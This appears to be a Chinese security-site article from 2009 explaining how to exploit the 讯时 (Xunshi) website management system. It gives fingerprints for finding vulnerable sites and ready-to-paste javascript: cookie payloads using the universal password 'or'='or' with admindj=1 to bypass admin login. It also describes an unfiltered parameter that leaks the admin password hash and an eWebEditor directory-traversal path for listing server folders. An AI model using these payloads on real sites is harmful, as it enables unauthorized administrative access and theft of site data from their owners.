ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报讯时网站管理系统漏洞利用
站内搜索:

讯时网站管理系统漏洞利用


2009/4/21  编辑:佚名 来源:本站整理 

最新讯时网站管理系统又有漏洞了,哎......真的不想说了,大家自己看吧!没意思,真的没有什么意识,真的很明白中国的这些程序员到底是在干什么,受不了:

漏洞: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录,下面的数据库是用的db/#ewebeditor.asp
以上特证只要中二个就基本可以肯定是这套系统

漏洞:COOKIES注入和列目录问题

利用方法:1、老版中存在一个后台COOKIES注入
直接打开登陆后台,然后在地址栏输入

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

这个功能就是把用户名和密码设置 为'or'='or' (这个有什么用不说了吧),还有把admindj设置为1


按回车后,直接访问 /管理目录/admin_index.asp就进后台了,后台直接有备份功能
管理目录自己找一下,一般在LOGIN.ASP的同级目录

2、其中的投票文件过滤不严,js-xgxx.asp文件的xgnews参数没有过滤,具体的可以一朋友写的专用小工具(也可以对其它某些有COOKIES注入,但关键字和其它一些参数是固定了,作用可能不大,只是我们写来娱乐一下的,牛人不要笑)
用这个直接可以得到管理员用户名和密码的MD5
有了MD5可以去破解,如果破不了把上面的改一下
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("密码md5值"));javascript:alert(document.cookie="admindj="+escape("1"));
确定后直进后台

3、如果以上还是不行那就看......还是cookies问题,有某些版本中过滤了COOKIES中的'号,这样我们的万能密码就起不了作用了,asp文件的COOKIES注入过没戏了,但是admindj=1还有用,输入完上面的代码后,如果还进不了后台,那就访问 /edit/admin_uploadfile.asp?id=14&dir=..,然后跟EWEBEDITOR的列目录漏洞一样,只需要改变dir=后面的参数就可以看到查应的目录,如dir=..\.. dir=..\..\..
可以找一些他的数据库备份啊或其它的。

参考消息:http://www.arpun.com/不说了,没有什么要说了,该说的也说了,都是这些漏洞,大家知道利用就好了,但是不要做什么坏事哦,否则与中国计算机网无关,特此申明下。
 

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/3158.html

相关文章
  • ·[组图]讯时网站管理系统CMS v3.7漏洞
  • ·讯时网站管理系统漏洞利用
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图